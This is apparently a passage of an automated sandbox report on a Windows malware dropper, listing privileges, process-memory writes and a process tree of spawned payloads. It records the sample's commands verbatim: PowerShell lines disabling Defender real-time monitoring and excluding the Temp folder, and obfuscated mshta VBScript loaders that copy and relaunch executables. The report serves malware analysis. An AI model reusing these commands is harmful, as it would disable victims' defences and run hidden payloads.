Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3688 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3688 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3688 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 836 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe
PID 836 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe
PID 836 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe
PID 2212 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1224 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2212 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2212 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
PID 2212 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2212 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1524 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe

Processes

C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe

"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe

Tue192c34b1c2f5.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe

Tue196397c0f84f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe

Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c9e031f4.exe

Tue19c9e031f4.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe

Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe

Tue19b4b38a7569a9.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe

Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe

Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp" /SL5="$60228,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2212 -ip 2212

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe

Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe

Tue19cd42a7c874e44.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe

Tue19cef5687a.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe

Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 640

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe

Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe

Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe

Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe

"C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp" /SL5="$A006C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1668 -ip 1668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 12

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1516 -ip 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 360

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue1932df4dae.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

